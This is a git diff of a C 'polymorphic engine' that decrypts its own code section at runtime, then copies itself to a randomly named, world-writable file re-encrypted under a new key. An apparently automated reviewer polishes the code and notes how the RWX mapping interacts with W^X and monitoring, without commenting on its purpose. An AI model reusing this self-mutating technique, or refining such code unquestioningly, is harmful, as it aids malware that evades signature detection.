PolymorphicEngine
Barry Cleaning up code 5f6e3ab (3 years, 5 months ago)
diff --git a/src/main.c b/src/main.c
index ab676ef..4048b5d 100644
--- a/src/main.c
+++ b/src/main.c
@@ -14,51 +14,10 @@
 #define POLYMORPHIC __attribute__((noinline, section(".polymorphic")))
-/* Linked values */
-extern unsigned char binaryStart[], polymorphicStart[], polymorphicEnd[];
-
 /* Keys */
 const uint8_t act[KEY_SIZE] = {}, /* Operators */
 key[KEY_SIZE] = {}; /* Operands */
-
-/* Functions */
-int polymorphic_main(int argc, char **argv);
-
-/* Traditional main function */
-int
-main(int argc, char **argv)
-{
- size_t i, mask;
- void *aligned;
- uint8_t *code = (uint8_t *) polymorphicStart;
- long pageSize = sysconf(_SC_PAGESIZE);
-
- /* Make memory writable */
- if (pageSize <= 0)
- return 1;
- mask = pageSize - 1;
- aligned = (void *) ((size_t) code & ~mask);
- if (mprotect(aligned, (polymorphicEnd - polymorphicStart) + pageSize, PROT_READ|PROT_WRITE|PROT_EXEC))
- return 1;
-
- /* Decrypt our code */
- for (i = 0; i < (polymorphicEnd - polymorphicStart); i++) {
- switch (act[i % KEY_SIZE]) {
- case 0:
- code[i] ^= key[i % KEY_SIZE];
- break;
- case 1:
- code[i] -= key[i % KEY_SIZE];
- break;
- case 2:
- code[i] += key[i % KEY_SIZE];
- break;
- }
- }
-
- /* Run the decrypted code */
- return polymorphic_main(argc, argv);
-}
+extern uint8_t binaryStart[], polymorphicStart[], polymorphicEnd[];
 /* Copy a file */
 POLYMORPHIC
@@ -98,8 +57,9 @@ polymorphic_main(int argc, char **argv)
 {
 char filename[NAME_PREFIX_LENGTH + NAME_AFFIX_LENGTH + 1] = NAME_PREFIX,
 /* Possible characters in filename */
- alpha[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
- uint8_t dKey[KEY_SIZE], dAct[KEY_SIZE], data, *code = (uint8_t *) polymorphicStart;
+ alpha[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+ uint8_t dKey[KEY_SIZE], dAct[KEY_SIZE], data,
+ *code = (uint8_t *) polymorphicStart;
 FILE *child;
 size_t i;
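Review bot: In the `@@ -14,51 +14,10 @@` hunk the re-added `extern uint8_t binaryStart[], polymorphicStart[], polymorphicEnd[];` line has lost the `/* Linked values */` comment that the old declaration carried, so nothing now says where these three symbols are defined. I would keep a comment on it, for example `/* Section boundary symbols, defined at link time rather than in this file */`, worded to match whatever actually provides them, since that is not visible in this diff. The declaration also now sits after the key arrays instead of before them, which is harmless but makes the comment more useful for a reader scanning the top of the file.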
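Review bot: In the `@@ -98,8 +57,9 @@` hunk the new `alpha[]` initialiser drops the digits `0123456789`, which changes the set of generated file names in a commit whose message only says "Cleaning up code". A behaviour change like this should either be in its own commit or be stated in the message, and the comment above it should say what the alphabet now is, for example `/* Possible characters in filename: ASCII letters only */`. The body of `polymorphic_main` continues outside this hunk, so any other user of `alpha[]` beyond the loop in the next hunk is not visible here.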
@@ -107,8 +67,8 @@ polymorphic_main(int argc, char **argv)
 srand(time(NULL));
 /* Duplicate file */
- for (i = NAME_PREFIX_LENGTH; i < sizeof(filename)-1; i++)
- filename[i] = alpha[rand() % (sizeof(alpha)-1)];
+ for (i = NAME_PREFIX_LENGTH; i < sizeof(filename) - 1; i++)
+ filename[i] = alpha[rand() % (sizeof(alpha) - 1)];
 copy_file(argv[0], filename);
 chmod(filename, 0777);
@@ -129,7 +89,7 @@ polymorphic_main(int argc, char **argv)
 fwrite(dKey, 1, KEY_SIZE, child);
 /* Encrypt our code */
- fseek(child, (unsigned long int) (polymorphicStart - binaryStart), SEEK_SET);
+ fseek(child, (uint64_t) (polymorphicStart - binaryStart), SEEK_SET);
 for (i = 0; i < (polymorphicEnd - polymorphicStart); i++) {
 data = code[i];
 switch (dAct[i % KEY_SIZE]) {
@@ -151,3 +111,39 @@ polymorphic_main(int argc, char **argv)
 return 0;
 }
+
+/* Traditional main function */
+int
+main(int argc, char **argv)
+{
+ size_t i, mask;
+ void *aligned;
+ uint8_t *code = (uint8_t *) polymorphicStart;
+ long pageSize = sysconf(_SC_PAGESIZE);
+
+ /* Make memory writable */
+ if (pageSize <= 0)
+ return 1;
+ mask = pageSize - 1;
+ aligned = (void *) ((size_t) code & ~mask);
+ i = (polymorphicEnd - polymorphicStart) + pageSize;
+ if (mprotect(aligned, i, PROT_READ|PROT_WRITE|PROT_EXEC))
+ return 1;
+
+ /* Decrypt our code */
+ for (i = 0; i < (polymorphicEnd - polymorphicStart); i++)
+ switch (act[i % KEY_SIZE]) {
+ case 0:
+ code[i] ^= key[i % KEY_SIZE];
+ break;
+ case 1:
+ code[i] -= key[i % KEY_SIZE];
+ break;
+ case 2:
+ code[i] += key[i % KEY_SIZE];
+ break;
+ }
+
+ /* Run the decrypted code */
+ return polymorphic_main(argc, argv);
+}
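Review bot: In the `@@ -129,7 +89,7 @@` hunk the new `(uint64_t)` cast on the `fseek` line does not match the parameter it feeds, because `fseek` takes its offset as `long`. The pointer difference is made unsigned and 64-bit only to be converted implicitly back to a signed type, which narrows where `long` is 32 bits. The cast should name the real parameter type, `fseek(child, (long) (polymorphicStart - binaryStart), SEEK_SET);`. The call's return value is also ignored in the visible lines, so a failed seek would go unnoticed by the loop that follows. That loop and the rest of `polymorphic_main` continue outside the hunk.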
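Review bot: In the `@@ -151,3 +111,39 @@` hunk the relocated `main` leaves the `.polymorphic` pages readable, writable and executable for the rest of the process. The `mprotect` call adds `PROT_WRITE` to an executable mapping and nothing visible after the decrypt loop removes it. A mapping like this is refused where W^X is enforced (for example by SELinux's execmem check or PaX MPROTECT), in which case `main` just returns 1. It is also a property that runtime monitoring commonly flags. The function documents none of this, so I would add above the call a comment such as `/* Needs a writable+executable mapping of .polymorphic; returns 1 where W^X is enforced */`.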